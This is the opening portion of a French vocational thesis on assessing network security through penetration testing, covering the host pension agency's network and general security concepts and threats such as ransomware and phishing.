Vous êtes sur la page 1sur 82

République Algérienne démocratique et populaire

Ministère de la formation et de l’enseignement professionnels

I.N.S.F.P chabouni idriss, JIJEL.

Mémoire de fin de formation


En vue de l’obtention du diplôme de technicien supérieur en :
Spécialité :
Administration et Sécurité des Réseaux Informatiques

Thème

Evaluation de la sécurité d’un réseau informatique


Mécanisme test d’intrusion

Encadré par : Réalisé par :

- Mlle Nadia Boukhedenna - Adil Chouieb

- Mohammed islem Chetouane

Promotion:

2016/2018
Remerciements
Nous tenons tout d’abord à remercier Dieu le tout puissant et miséricordieux, qui nous a donné
la force et la patience d’accomplir ce Modeste travail.

Nous souhaitons d’adresser nos remerciements les plus sincères aux personnes qui nous ont
apporté leur aide et qui ont contribué à l’élaboration de ce mémoire.

Ensuite nous tenons à remercier notre encadreur Mlle Nadia Boukhedenna Pour l’orientation,
la confiance, la patience qui a constitué un apport considérable sans lequel ce travail n’aurait
pas pu être mené au bon port. Qu’elle trouve dans ce travail un hommage vivant à sa haute
personnalité.

Nous tenons aussi à remercier les membres du jury qui ont accepté d’examiner notre

mémoire.

Enfin, nous adressons nos plus sincères remerciements à tous nos proches et amis, qui nous ont
toujours soutenue et encouragé au cours de la réalisation de ce mémoire.

Merci à tous et à toutes.


Table des matières

Présentation de l’organisme d’accueil ................................................................... 1

I.1.Introduction .............................................................................................................................1
I.2.Présentation de la CNR ...........................................................................................................1
I.2.1.L’organisation interne de la CNR ................................................................................................. 1
I.2.2.Rôle de quelques services importants au sein de l’entreprise ...................................................... 2
I.2.3.Schéma type de réseau de l’entreprise ......................................................................................... 3
I.2.4Le rôle du serveur de l’entreprise ................................................................................................. 4
I.2.5.Présentation des équipements réseaux ......................................................................................... 5
I.3.Définition des différents types de support .............................................................................9
I.3.1.Supports de transmission de données .......................................................................................... 9
I.3.2.Autres équipements réseau ....................................................................................................... 10
I.4.Conclusion ...........................................................................................................................11

LA SECURITE INFORMATIQUE ................................................................................. 12


II.1.Introduction .........................................................................................................................12
II.2.Sécurité des réseaux .............................................................................................................12
II.3.Evaluation de la sécurité d'un réseau ...................................................................................12
II.4.Importance de sécuriser un réseau .....................................................................................13
II.4.1.Les enjeux ................................................................................................................................. 13
II.4.2.Les vulnérabilités ..................................................................................................................... 14
II.4.3.Les menaces .............................................................................................................................. 14
II.5.Mécanismes de la sécurité ..................................................................................................19
II.5.1.Le Cryptage ............................................................................................................................... 19
II.5.2.Le Pare-feu ................................................................................................................................ 20
II.5.3.L’antivirus ................................................................................................................................. 20
II.5.4.VPN ........................................................................................................................................... 21
II.5.5.IDS ............................................................................................................................................ 21
II.6.Audit de sécurité .................................................................................................................21
II.7.Conclusion ..........................................................................................................................22

LE TEST D'INTRUSION ............................................................................................. 23


III.1.Introduction ........................................................................................................................23
III.2.Définition du test d’intrusion .............................................................................................23
III.3.Objectifs du test d’intrusion ..............................................................................................24
III.4.Types de test d’intrusion ....................................................................................................26
III.5.Méthodologie du test d’intrusion ......................................................................................28
III.5.1.Définition de PTES .................................................................................................................. 28
III.6.Logiciels de test d’intrusion ..............................................................................................32
III.7.Conclusion ..........................................................................................................................33

ENVIRONNEMENT ET OUTILS DE TRAVAIL .............................................................. 34


IV.1.Présentation de l’environnement de travail ...........................................................................34

IV.2.Outils de travail................................................................................................................................... 35

IV.2.1.Système d’exploitation ........................................................................................................... 35


IV.2.2.Logiciels de pentest ................................................................................................................. 41
IV.3.Terminologie....................................................................................................................................... 49

IV.4.Conclusion .......................................................................................................................................... 49

REALISATION DE TEST D'INTRUSION ...................................................................... 50


V.1.Introduction .......................................................................................................................................... 50

V.2.Collecte d’informations ....................................................................................................................... 50

V.2.1.L’analyse du réseau................................................................................................................... 50
V.2.2.Détection des services et de versions ....................................................................................... 53
V.2.3.Détection d‘OS ......................................................................................................................... 53
V.2.4.Conclusion ............................................................................................................................... 55
V.3.Analyse et évaluation des vulnérabilités ............................................................................................. 56

V.3.1Evaluation de la vulnérabilité avec Armitage ........................................................................... 56


V.3.2.Evaluation de la vulnérabilité avec MSFCONSOLE ............................................................... 57
V.3.3.Conclusion ............................................................................................................................... 58
V.4.Exploitation .......................................................................................................................................... 58
V.4.1.L’exploit Eternalblue porté sur Metasploit .............................................................................. 58
V.5.Post-Exploitation.................................................................................................................................. 60

V.5.1.Commandes de Meterpreter ..................................................................................................... 61


V.5.2.Modules de Post-Exploitation .................................................................................................. 62
V.6.Rapport ................................................................................................................................................. 64

V.7.Conclusion ........................................................................................................................................... 67

CONCLUSION GENERALE ........................................................................................ 68

BIBLIOGRAPHIE ...................................................................................................... 69
Liste des abréviations

CNR ................................................................................................ La caisse nationale des retraites


CRSA ................................................................................... Centre régionale de saisie et d’archive
VPN............................................................................................................. Virtual Private Network
SSL................................................................................................................... Secure Socket Layer
FAI .....................................................................................................Fournisseur d’accès à internet
USB .................................................................................................................. Universal Serial Bus
FTP ................................................................................................................. File Transfer Protocol
DNS............................................................................................................... Domain Name System
HTTP.................................................................................................. Hyper Text Transfer Protocol
DDOS ..................................................................................................Distributed Denial of Service
IDS ......................................................................................................... Intrusion Detection System
SATAN .......................................................... Security Administrator Tool for Analyzing Network
Pentester .............................................................................................................. Testeur d’intrusion
PTES ................................................................................ Penetration Testing Execution Standards
GTK .............................................................................................................................Gimp Toolkit
SSH ............................................................................................................................... Secure Shell
IMAP......................................................................................... Internet Messaged Access Protocol
POP3 ................................................................................................................. Post Office Protocol
MAC .............................................................................................................. Media Access Control
NSA.......................................................................................................... National Security Agency
NMap ..................................................................................................................... Network Mapper
MSF...............................................................................................................Metasploit-Framework
Pentest ...................................................................................................................... Test d’intrusion
DHCP ................................................................................... Dynamic Host Configuration Protocol
IPS ........................................................................................................ Intrusion Prevention System
LTS .................................................................................................................... Long Term Support
NMap ..................................................................................................................... Network Mapper
GO/GB ............................................................................................................................. Giga Octet
TO/TB ...............................................................................................................................Tera Octet
GHz ................................................................................................................................... Giga Herz
CD ...............................................................................................................................Compact Disk
DVD ................................................................................................................Digital Versatile Disc
PC........................................................................................................................ Personal Computer
GRUB .................................................................................................... GRand Unified Bootloader
OS ......................................................................................................................... Operating System
CPU ............................................................................................................. Central Processing Unit
SSD ........................................................................................................................ Solide State Disk
HDD ........................................................................................................................ Hard Disk Drive
SMB ...............................................................................................................Server Message Block
ARP ......................................................................................................Address Resolution Protocol
SYN.................................................................................................................................. Synchrony
ACK ...................................................................................................................... Acknowledgment
RST ........................................................................................................................................... Reset
TCP .................................................................................................. Transmission Control Protocol
UDP.............................................................................................................User Datagram Protocol
RDP .......................................................................................................... Remote Desktop Protocol
Liste des tableaux

Tableau IV - 1 - Les différents outils de Kali-Linux ........................................................... 41


Introduction Générale

L’informatique joue un rôle grandissant dansnotre société. Un grand nombre


d’applications critiques d’un point de vue deleurs sécurité sont déployées dans divers domaines
comme le domaine militaire, la santé, les banques, etc.c’est pour cela que lasécurité de ces
réseaux constitue un enjeu crucial.
La sécurité est désormais une exigence de base car l'informatique distribuée est
fondamentalement non sécurisée. Dans une organisation, quelle que soit sa taille et son volume,
l'un des nombreux rôles joués par les administrateurs réseau et système est d'améliorer la sécurité
de l'infrastructure informatique. Cependant, avec la surface rapide de nouvelles vulnérabilités et
exploits, parfois même un système ou un réseau entièrement corrigé présente des failles de
sécurité. Il existe différentes mesures de sécurité que l'administrateur réseau / système peut
déployer pour sécuriser le réseau ou le système. Toutefois, le meilleur moyen de garantir la
sécurité du réseau ou du système consiste à effectuer des tests d’intrusion.
Le test d’intrusion est l’un des mécanismes les plus important utilisé de nos jours dans les
entreprises pour évaluer la sécurité de leurs réseau informatique, et qui a prouvé sa fiabilité.et
c’est pourquoi c’était le sujet de notre présent mémoire accompagné par un stage pratique au
niveau du CNR l’une des organisations qui n’échappe pas des menaces. Et pour faire face à ces
menaces elle doit avoir une politique de sécurité.
Notre travail a comme objectif de déterminer la faisabilité d'une attaque et son impact
sur un exploit réussi s'il est découvert. Le processus implique une analyse active du système pour
toutes les vulnérabilités qui peuvent êtres résultées d'une mauvaise configuration du système, des
défauts du matériels ou logiciels connus ou inconnus. Cela aide à réduire les risques de sécurité
et de confirmer si les mesures de sécurité actuelles mises en œuvre sont efficaces.
Pour atteindre notre objectif on a divisé notre présent mémoire en Cinque chapitre :
 Premier chapitre : une introduction au réseau et à l’environnement de l’entreprise
CNR
 Deuxième chapitre : une présentation des différents concepts lies à la sécurité et
les politiques de sécurité.
 Troisième chapitre : présentation du test d'intrusion, ces types, les principaux
outils pour le réaliser ainsi que la méthodologie à suivre.
 Quatrième chapitre : une description de l’environnement de travail pour la mise
en place d’une solution de sécurité.
 Cinquième chapitre : réalisation du test d'intrusion où on a suivi la méthodologie
(PTES), avec l’utilisation des différents outils choisis dans notre pratique.
CHAPITRE I: PRESENTATION DE L’ORGANISME D’ACCUEIL

I.1 .Introduction

Afin de nous familiariser avec l’environnement de l’entreprise, nous avons d’emblée


cherché à définir l’activité principale de la CNR, ses différentes divisions qui la constituent.
Nous sommes intéressées par la division Informatique afin de comprendre l’architecture
réseau de l’entreprise, pour Ce chapitre est ainsi, une introduction au réseau et à
l’environnement de l’entreprise CNR « Division Informatique ».1

I.2 .Présentation de la CNR

La caisse nationale des retraites CNR de la wilaya de Jijel, est créé en 1984 par la loi
n°83 – 11 du 02 juillet 1983, cette agence est l’une parmi les 51 caisses de retraite, qui sont
implantées dans les différentes wilayas de pays. Elles ont pour objectif de liquidées le dossier
de retraite dans les meilleurs délais, le payement régulier des retraites, et la maitrise des
dépenses.1

I.2.1 .L’organisation interne de la CNR

La caisse nationale des retraites, agence locale de la wilaya de Jijel est composée
d’une direction, trois sous directions, une centre régionale de saisie et d’archive (CRSA), une
cellule informatique. Voici L’organigramme suivant :

1
CNR de Jijel

1
CHAPITRE I: PRESENTATION DE L’ORGANISME D’ACCUEIL

Figure I - I – Organigramme de l’organisation interne de CNR

I.2.2 .Rôle de quelques services importants au sein de l’entreprise

 Centre de calcul informatique

Le centre de calcul est au cœur de l’infrastructure administrative et informatique du CNR.


Tous les courriers électroniques, fichiers des expériences et vidéo conférences scientifiques
utilisent les services du centre.

 CRSA

Le CRSA est chargé notamment de la création et la mise à jour des fichiers et des répertoires
des sources d’information d’intérêt fiscal et la digitalisation, la conservation et la sauvegarde
des données.

2
CHAPITRE I: PRESENTATION DE L’ORGANISME D’ACCUEIL

 Sous directions des opérations financières / Division finance et comptabilité

Cette division a pour tâche essentielle de s’assurer que la direction régionale dispose en
temps voulu, des fonds nécessaires à sa croissance et son développement et que l’argent
généré par les activités de l’entreprise soit investi de manière rentable.

I.2.3 .Schéma type de réseau de l’entreprise

Dans cette entreprise, il existe une hiérarchie au niveau des employés. C’est la même
chose au niveau des ordinateurs : l’un des ordinateurs va jouer le rôle du patron, on l’appelle
le serveur d’entreprise. C’est une machine plus puissante que les autres et qui a beaucoup de
responsabilités. Ce serveur est géré par le service informatique.

Le serveur est au centre de la configuration de réseau d’entreprise. Tous les


ordinateurs de la CNR y sont reliés. Les baies de stockage permettent la sauvegarde des
données informatiques et sont gérées par le serveur.

Figure I - II - Schéma de réseau de l'entreprise

3
CHAPITRE I: PRESENTATION DE L’ORGANISME D’ACCUEIL

I.2.4 .Le rôle du serveur de l’entreprise

Un serveur informatique est un dispositif informatique (matériel ou logiciel) qui offre


des services, à un ou plusieurs clients (parfois des milliers). Les rôles du serveur dans cette
entreprise sont :

 Le serveur a pour rôle de sauvegarder les données de l’entreprise. Si un employé efface


par erreur un document, ou il y a un mal fonctionnement d’un ou plusieurs ordinateurs, le
serveur est en mesure de rétablir les données perdus.

 Le serveur gère l’accès à Internet, qu’il distribue aux employés selon leurs autorisations.il
peut également filtrer les sites, pour ne pas que les employés finissent sur des sites de loisir
ou autres choses que son travail.

 Chaque employé possède un compte sécurisé par un mot de passe. Lorsque l’ordinateur
s’allume les identifiants de connexion sont demandés par le serveur. C’est lui qui s’occupe
d’authentifier l’utilisateur et lui autoriser l’accès à son poste de travail.

 Il aussi gère la réception et l’envoi d’e-mails. grâce à un filtre anti-spam il est capable de
filtrer le courrier indésirable.

 Le serveur va également mettre à disposition des employés des dossiers partagés,


accessibles à certains et pas à d’autres, selon le poste de l’employé.

 Lorsqu’un employé a un problème d’ordre informatique, il prend contact avec le service


des systèmes d’information. Une personne va prendre le contrôle de l’ordinateur à distance
afin de le dépanner, lui épargnant un déplacement.

 un réseau privé virtuel : la CNR est situé sur plusieurs sites géographiques. Par exemple
Bejaia, Alger et Sétif. Dans ce cas il existe une technologie appelée VPN : réseau privé
virtuel (Virtual Private Network en anglais). En clair le VPN agit pour qu’il n’y ait qu’un
réseau, peu importe les distances géographiques. 3 sites, mais un seul réseau d’entreprise.
Comme si tout le monde était à côté.

4
CHAPITRE I: PRESENTATION DE L’ORGANISME D’ACCUEIL

I.2.5 .Présentation des équipements réseaux

Cette partie consiste à définir les différents équipements réseaux utilises au sein de la
CNR, nous distinguons ainsi deux sections diverses associées aux matériels :

• Eléments actifs:
Regroupe les équipements d’interconnexion et de sécurité des réseaux de l’entreprise, on cite
parmi eux : Les commutateurs, les routeurs, les pare-feu, les VPN, les modems...

• Eléments passifs :
Regroupe quant a eu les différents types de câbles utilise pour interconnecter les équipements
réseau de l’entreprise, on cite parmi eux : la fibre optique, les câbles UTP, STP, etc.

A. Eléments actifs

Nous présenterons dans ce qui suit les équipements qui constituent l’actif du réseau de
l’entreprise sous ses différents aspects:
a) Aspect réseau

• Commutateur d’accès :
Un commutateur d’accès a pour rôle principal de fournir un moyen de connecter des
périphériques au réseau, ainsi que de contrôler les périphériques qui sont autorisés à
communiquer sur le réseau.1

• Commutateur de distribution :
Un commutateur de distribution regroupe les données requis à partir des commutateurs de
couche d’accès, avant qu’elles ne soient transmises vers la couche cœur de réseau, en vue de
leur routage vers la destination finale.2

• Commutateur cœur de réseau "fédérateur" :


Un commutateur fédérateur est essentiel à l’inter-connectivite entre les périphériques de la
couche de distribution. Il a aussi la capa- cite de regrouper le trafic de quantités importantes
provenant de tous les périphériques de couche de distribution afin de le réacheminer

1
https://www.cisco.com/c/fr_fr/products/index.html#~stickynav=1

5
CHAPITRE I: PRESENTATION DE L’ORGANISME D’ACCUEIL

rapidement vers la destination.2

- La gamme Cisco 7200 :


le routeur de gamme ”7200” offre une performance et évolutivité accentue avec un large
éventail d’options de déploiement avec des vitesses de traitement allant jusqu’à 400 000 de
paquets par seconde.2

b) Aspect système : L’infrastructure système de l’entreprise dispose d’un ensemble de


serveurs définis ci-dessous :

- Contrôleur de domaine "Active Directory" :


AD est le premier service d’annuaire d’entreprise évolutif qui, représente alors la base idéale
à long terme pour le partage des informations de l’entreprise et la gestion commune des
ressources réseau, parmi lesquelles des applications, des systèmes d’exploitation réseaux et
des services lies a l’annuaire .1

- Serveur de messagerie "Microsoft Exchange" :


Il s’agit d’une application de serveur de messagerie collaborative. Son rôle initial est le
stockage de courriers électroniques. Son utilisation est étendue au calendrier, aux listes de
taches, à la gestion des contacts et bien d’autres données qui sont partagées entre les
utilisateurs.2

c) Aspect sécurité

- Pare-feu ASA:
Le firewall Cisco ASA, assure une protection optimale, grâce à de nombreuses
fonctionnalités qui sont: le contrôle d’applications, la protection en temps réel contre les
attaques des applications DOS, détection et filtrage de l’activité réseau des vers et des virus,
détection des spywares, l’inspection avancée des protocoles voix, les signatures IPs
spécifiques, services IPSec et SSL protèges, services SSL avec client ou avec portail 3.

1
https://technet.microsoft.com/fr-fr/library/ms808927.aspx
2
https://en.wikipedia.org/wiki/Microsoft_Exchange_Server
3
https://bit.ly/2wyPExB

6
CHAPITRE I: PRESENTATION DE L’ORGANISME D’ACCUEIL

- VPN IPsec/SSL :
La solution Cisco ASA série 5500 VPN Edition permet aux entreprises de profiter des
avantages d’Internet en termes de connectivite et de cout, sans compromettre l’intégrité des
règles de sécurité d’entreprise. En faisant converger les services Cisco WebVPN, composes
des services VPN IPSec (IP Security) et SSL (Secure Sockets Layer), avec les technologies
complètes de défense contre les menaces, la gamme Cisco ASA série 5500 propose un VPN
totalement sécurise avec une sécurité complète au niveau du réseau et du point d’extrémité.1

- Proxy "ISA Serveur" :


ISA Server est une passerelle de haute sécurité qui protège le réseau informatique d’une
entreprise contre les menaces en provenance d’Internet, tout en offrant aux utilisateurs un
accès à distance rapide et sécurise aux données et aux applications2.

- Antivirus Kaspersky :
Kaspersky Anti-virus Corporate protège les ordinateurs contre les infections virales de toutes
sortes qui se propagent à partir des disques durs, des disquettes et des pièces jointes à des
courriers électroniques, et contre les virus transmis sur les réseaux. Kaspersky réagit a la
présence de fichiers infectes en exécutant des opérations principales et secondaires. C’est
pour ces raisons la, que l’entreprise CNR a employé cet antivirus au sein de son réseau afin
de renforcer et de prévenir toutes menaces voulant affecter le fonctionnement du réseau de
l’entreprise3.

- Serveur NAC :
C’est un Serveur de Contrôle d’Admission Réseau (Network Admission Control) facile à
déployer qui permet à l’administrateur réseau d’authentifier, d’autoriser, d’évaluer et de
corriger les équipements filaires, sans fil et distants avant de donner à leurs utilisateurs un
accès au réseau. Il détermine si les équipements en réseau : ordinateurs portables ou fixes,
etc. sont conformes aux politiques de sécurité de l’entreprise et répare les éventuelles
vulnérabilités avant de leur permettre l’accès au réseau.4

1
https://bit.ly/2LN6lLg
2
https://searchenterprisedesktop.techtarget.com/definition/ISA-Server
3
https://www.kaspersky.com/
4
https://bit.ly/2NCWU2G

7
CHAPITRE I: PRESENTATION DE L’ORGANISME D’ACCUEIL

B. Eléments passifs

Dans cette partie nous sommes appelés a parler de deux types de câblage distincts: le câblage
horizontal et le câblage vertical.1

• Le câblage horizontal :
Ce type de câblage désigne les câbles qui connectent les armoires de répartition aux zones de
travail. La longueur maximale d’un câble reliant un point de terminaison de l’armoire de
répartition à la terminaison de la prise de la zone de travail ne doit pas dépasser 90 mètres.
Cette distance de câblage horizontal maximale est appelée liaison permanente car elle est
installée dans la structure même du bâtiment. Le support horizontal chemine entre un tableau
de connexions de l’armoire de répartition et une prise téléphonique murale dans chaque zone
de travail. Les connexions aux périphériques sont effectuées au moyen de cordons de
raccordement.2

• Le câblage vertical :
Le câblage vertical désigne le câblage utilise pour connecter les armoires de répartition aux
salles d’équipements, dans lesquelles se trouvent souvent les serveurs. Le câblage vertical
interconnecte également plusieurs armoires de répartition dans l’ensemble du bâtiment. Ces
câbles sont parfois achemines en dehors du bâtiment vers la connexion du réseau étendu ou le
FAI. Le câblage vertical est utilisé pour le trafic agrège comme le trafic en direction et en
provenance d’Internet et l’accès aux ressources de l’entreprise sur un site distant. Une grande
partie du trafic provenant des différentes zones de travail utilise le câblage vertical pour
accéder aux ressources en dehors de la zone ou du bâtiment. Par conséquent, les câbles
verticaux nécessitent généralement un support de bande passante important.10

Afin de distinguer clairement l’emploi du câblage horizontal par rapport au vertical, nous
avons ci-dessous une figure qui récapitule ce que l’on a cité précédemment.

1
https://www.robertponge.com/telechargements/ebooks/cables-r%C3%A9seaux.pdf
2
https://www.robertponge.com/telechargements/ebooks/cables-r%C3%A9seaux.pdf

8
CHAPITRE I: PRESENTATION DE L’ORGANISME D’ACCUEIL

Figure I - III - Zones de câblage de réseau local10

I.3 .Définition des différents types de support


Les infrastructures ou supports peuvent être des câbles dans lesquels circulent des
signaux électriques, l'atmosphère où circulent des ondes radio, ou des fibres optiques qui
propagent des ondes lumineuses. Dans les réseaux en étoile, le support de communication est
fréquemment désigné par le terme Ethernet du nom du standard de transmission de données
utilisé sur ce type de réseau.
Le choix d’un support de transmission dépend de certains facteurs qui sont les suivants :

- Le cout;
- La résistance aux perturbations électromagnétique ou radioélectriques potentielles ;
- La facilite d’installation et de maintenance;
- La bande passante;
- La portée du câble;

I.3.1 .Supports de transmission de données

Le support le plus souvent utilise pour les communications de données est le câblage
qui utilise des fils de cuivre pour la transmission de bits de données et de contrôle entre les
périphériques réseau. Le câblage employé pour les communications de données se compose
généralement d’une série de fils de cuivre individuels formant des circuits dédies à des fins
de signalisation spécifiques.1

a) Le câble coaxial : Il est composé d’un fil de cuivre entouré successivement d’une
gaine d’isolation, d’un blindage en métal et d’une gaine extérieur. Sa bande passante

1
https://www.etudier.com/dissertations/Les-Supports-De-Transmission/114261.html

9
CHAPITRE I: PRESENTATION DE L’ORGANISME D’ACCUEIL

maximum est d'environ 150 MHz Les pertes de signal sont de nature multiple sur un
câble coaxial, l'augmentation de la longueur du câble, l'augmentation de la fréquence
et la diminution du diamètre du conducteur mènent à des pertes de signal.12

b) La paire torsadée : Il est constitué de deux brins de cuivre entrelacés en torsade et


recouverts d'isolants. Les fils sont "enroulés" ou "torsadés" dans le but de maintenir
précisément la distance entre fils et de diminuer les pertes de signal. Plus le nombre
de torsades est important, plus la diaphonie est réduite.12

c) La fibre optique : Elle est constituée en fibre de verre, l'information circule sous
forme lumineuse. Le coût est élevé mais les performances ne s’amenuisent pas avec
la distance.12

d) Sans fil : permettent de connecter des machines entre elles sans utiliser de câbles. La
norme la plus utilisée actuellement pour les réseaux sans fil est la norme IEEE 802.11,
mieux connue sous le nom de Wi-Fi .Le Wi-Fi permet de relier des machines sur un
rayon de plusieurs dizaines de mètres.1

I.3.2 Autres équipements réseau

Armoire de brassage :
Une baie de brassage est une armoire technique et métallique, qui centralise les
équipements réseau d’une entreprise en un seul endroit, lui permettant d’accéder à son
intranet et à internet.
Le choix d’une baie de brassage informatique s’effectue après avoir déterminé les
équipements à intégrer (nombre de panneaux de brassage, commutateur Ethernet...),
ceux-ci sont standardises : en largeur la norme 19 "482,6 mm" est le seul système
accepte et utilise dans le monde entier, la hauteur quant à elle s’exprime en "U" tel
qu’un U = 44,45mm. Il suffit donc d’additionner les hauteurs en U de chaque élément
à intégrer pour déterminer l’armoire de brassage selon les besoins spécifiques. Au
niveau de la CNR le nombre maximal de "U" dans une armoire de brassage est de
"9".2

1
https://www.robertponge.com/telechargements/ebooks/cables-r%C3%A9seaux.pdf
2
https://www.ceso-gto.com/cablage-et-baie/baie-de-brassage/

10
CHAPITRE I: PRESENTATION DE L’ORGANISME D’ACCUEIL

I.4 .Conclusion

Parce que les données de l’entreprise sont privées et ne doivent pas tomber à la portée
de tous, cette entreprise doit protéger ces données de l’intrusion intérieure ou bien extérieure.
Il ne laisse pas n’importe qui accéder au réseau, seules les personnes autorisées peuvent le
faire.

Dans le chapitre qui suit nous allons présenter les différents concepts lies a la sécurité
et les politiques de sécurité, nous aborderons par la suite les attaques essentielles qui peuvent
dégrader le fonctionnement d’un réseau ainsi que les différentes contremesures pour y
remédier.

11
CHAPITRE II: LA SECURITE INFORMATIQUE

II.1.Introduction

Le système d'information est généralement défini par l'ensemble des données et des
ressources matérielles et logicielles de l'entreprise permettant de les stocker ou de les faire
circuler. Le système d'information représente un patrimoine essentiel de l'entreprise, qu'il
convient de protéger. La sécurité informatique, d'une manière générale, consiste à assurer
que les ressources matérielles ou logicielles d'une organisation sont uniquement utilisées
dans le cadre prévu.

Les exigences fondamentales de la sécurité Informatiques se résument à assurer:

 La disponibilité : L'information sur le système doit être toujours disponible aux


personnes autorisées.

 La confidentialité : L'information sur le système ne doit être diffusée qu’aux personnes


autorisées.

 L’Intégrité : L'information sur le système ne doit pouvoir être modifiée que par les
personnes autorisées.

Tout au long de ce chapitre, notre intérêt se porte sur les principales menaces pesant
sur la sécurité des réseaux ainsi que les mécanismes de défense.
II.2.Sécurité des réseaux

La sécurité d'un réseau est un ensemble de moyens techniques, organisationnels,


juridiques et humains nécessaires et mis en place pour conserver, rétablir, et garantir sa
sécurité. En général, la sécurité d'un réseau englobe celle du système informatique sur
lequel il s'appuie.1

II.3.Evaluation de la sécurité d'un réseau


La sécurité d'un réseau peut s'évaluer sur la base d'un certain nombre de critères de
sécurité. On distingue généralement trois principaux critères de sécurité :

• Disponibilité : Elle consiste à garantir l'accès à un service ou à une ressource.


• Intégrité : Elle consiste à s'assurer que les données n'ont pas été altérées durant la
communication (de manière fortuite ou intentionnelle).
• Confidentialité : Elle consiste à rendre l'information inintelligible à d'autres personnes

1
http://www.marche-public.fr/Terminologie/Entrees/Reseau-securite.htm

12
CHAPITRE II: LA SECURITE INFORMATIQUE

que les seuls acteurs concernés.


En plus de ces trois critères, on peut ajouter les critères suivants:
• Authentification : Elle consiste à assurer l'identité d'un utilisateur, c'est-à dire de
garantir à chacun des correspondants que son partenaire est bien celui qu'il croit être.
• Non répudiation : Elle consiste à garantie qu'aucun des correspondants ne pourra nier la
transaction.

L'évaluation de la sécurité d'un système informatique est un processus très


complexe basé en général sur une méthodologie. Cette évaluation passe par une analyse de
risques. Cette dernière pesant sur un système informatique elle-même s'appuie sur un
ensemble de métriques définies au préalable.1

II.4.Importance de sécuriser un réseau

II.4.1.Les enjeux

a) Enjeux économiques : Les organismes ou entreprises à but lucratif on presque toujours


la même finalité : c'est de réaliser des bénéfices sur l'ensemble de leurs activités. Cette
réalisation est rendue possible grâce à son système d'information considéré comme moteur
de développement de l'entreprise. D'où la nécessité de garantir la sécurité de ce dernier. La
concurrence fait que des entreprises s'investissent de plus en plus dans la sécurisation de
leurs systèmes d'information et dans la qualité de service fournit aux clients.

b) Enjeux politiques : La plupart des entreprises ou organisations se réfèrent aux


documents officiels de sécurité élaborés et recommandés par l'État. Ces documents
contiennent généralement des directives qui doivent être appliquées par toute structure
engagée dans un processus de sécurisation du réseau. Dans le cadre du chiffrement des
données par exemple, chaque État définit des cadres et mesures d'utilisation des
algorithmes de chiffrement et les recommande aux entreprises exerçant sur son territoire.
Le non-respect de ces mesures et recommandations peut avoir des conséquences graves sur
l'entreprise. A ce niveau, l'enjeu est plus politique parce que chaque État souhaite être
capable de décrypter toutes les informations circulant dans son espace.2

c) Enjeux juridiques : Dans un réseau, on retrouve de l'information multiforme


(numérique, papier, etc.). Le traitement de celle-ci doit se faire dans un cadre bien définit

1
Elie MABO, La sécurité des systèmes informatiques (Théorie), support de cours,2010.

13
CHAPITRE II: LA SECURITE INFORMATIQUE

et dans le strict respect des lois en vigueur. En matière de juridiction, le non-respect des
lois et exigences relatives à la manipulation des informations dans un système
d'information peut avoir des conséquences graves sur l'entreprise.1

II.4.2.Les vulnérabilités

Tous les systèmes informatiques sont vulnérables. Peu importe le niveau de


vulnérabilité de ceux-ci. Une vulnérabilité est une faille ou une faiblesse pouvant être
exploitées par des menaces, dans le but de les compromettre. Une telle exploitation peut
causer des impacts importants. De nouvelles vulnérabilités sont découvertes régulièrement.
Il est possible de les regrouper en plusieurs familles :
a) Vulnérabilités humaines : L'être humain de par sa nature est vulnérable. La plupart des
vulnérabilités humaines proviennent des erreurs (négligence, manque de compétences,
surexploitation, etc.), car ne dit-on pas souvent que l'erreur est humaine? Un SI étant
composé des humains, il convient d'assurer leur sécurité si l'on veut garantir un maximum
de sécurité dans le SI.
b) Vulnérabilités technique: Avec la progression exponentielle des outils informatiques,
les vulnérabilités technologiques sont découvertes tous les jours. Ces vulnérabilités sont à
la base dues à une négligence humaine lors de la conception et la réalisation. Pour être
informé régulièrement des vulnérabilités technologiques découvertes, il suffit de s'inscrire
sur une liste ou des listes de diffusion mises en place par les CERT (Computer Emergency
Readiness ou Response Team).4
c) Vulnérabilités physique : Les vulnérabilités d'ordre organisationnel sont dues à
l'absence des documents cadres et formels, des procédures (de travail, de validation)
suffisamment détaillées pour faire face aux problèmes de sécurité du système. Quand bien
même ces documents et procédures existent, leur vérification et mises à jour ne sont pas
toujours bien assurées.2

II.4.3.Les menaces
Les menaces informatiques sont variées et redoutables d'efficacité. Toutes les
études arrivent à la même conclusion : les entreprises sont de plus en plus victimes de
piratage informatique. Voici des différentes menaces auxquelles sont confrontées les
entreprises.

1
Elie MABO, La sécurité des systèmes informatiques (Théorie), support de cours,2010.
2
https://www.cases.lu/vulnerabilites.html

14
CHAPITRE II: LA SECURITE INFORMATIQUE

a) Les logiciels de rançon (Ransomwares) : il s’agit des virus les plus répandus
actuellement. C’est la version numérique du racket : les données de l’entreprise sont prises
en otage par un pirate. Le principe de cette infection est le suivant : caché dans une pièce
jointe, un programme malveillant chiffre les documents stockés dans l’ordinateur qui a été
le premier infecté. Mais en quelques secondes, tous les fichiers partagés par les différents
collaborateurs sont également bloqués. Impossible de les ouvrir, sauf si l’on paie une
rançon dont le montant qui augmente au fil du temps pour faire monter la pression.1
La figure ci-dessous montre l’interface du logiciel (virus) « WannaCry »de type
Ransomware.

Figure I - Interface de WannaCry

b) Hameçonnage (Phishing / Scamming) : Un autre danger fait toujours parler de


lui : le phishing ou l’hameçonnage. Tout le monde connaît ces emails usurpant l’identité
d’une entreprise privée ou d’une administration. Mais les cybercriminels ont beaucoup
d’imagination et de talents pour concevoir de faux courriers avec le logo officiel. On peut
facilement tomber dans ce piège. Ce sont alors des mots de passe qui sont récupérés ou
l’installation de programmes malveillants qui s’exécute alors avec le « consentement » de

1
https://www.altospam.com/actualite/2017/10/ransomwares-chiffres-statistiques/

15
CHAPITRE II: LA SECURITE INFORMATIQUE

l’utilisateur. À ce jour, il s’agit de la technique la plus « rentable », selon la dernière étude


de Google à ce sujet. Les chercheurs évaluent le taux de réussite de ce type d'attaque entre
12 et 25% !1

Figure II - Phishing Email pour pirater Facebook

c) La fuite de données : Elle peut être due à l’infiltration du réseau informatique par
un pirate. Mais elle peut aussi provenir d’un salarié de l’entreprise ! Les employés
constituent historiquement le plus grand risque. Ils ont des connaissances, des autorisations
et le temps en leur faveur. Dès lors, la fuite de données peut être intentionnelle. Un
employé enregistre des informations critiques sur une clé USB, ou les envoie sur sa
messagerie personnelle, pour ensuite les revendre à la concurrence. Cette fuite de données
peut être également due à la négligence des collaborateurs qui naviguent sur des sites non
sécurisés ou laissent leur session ouverte ou utilise des mots de passe trop faible.2
L’une des méthodes couramment utilisée par les pirates informatiques pour
espionner le trafic sur le réseau Le Sniffing ou reniflement.

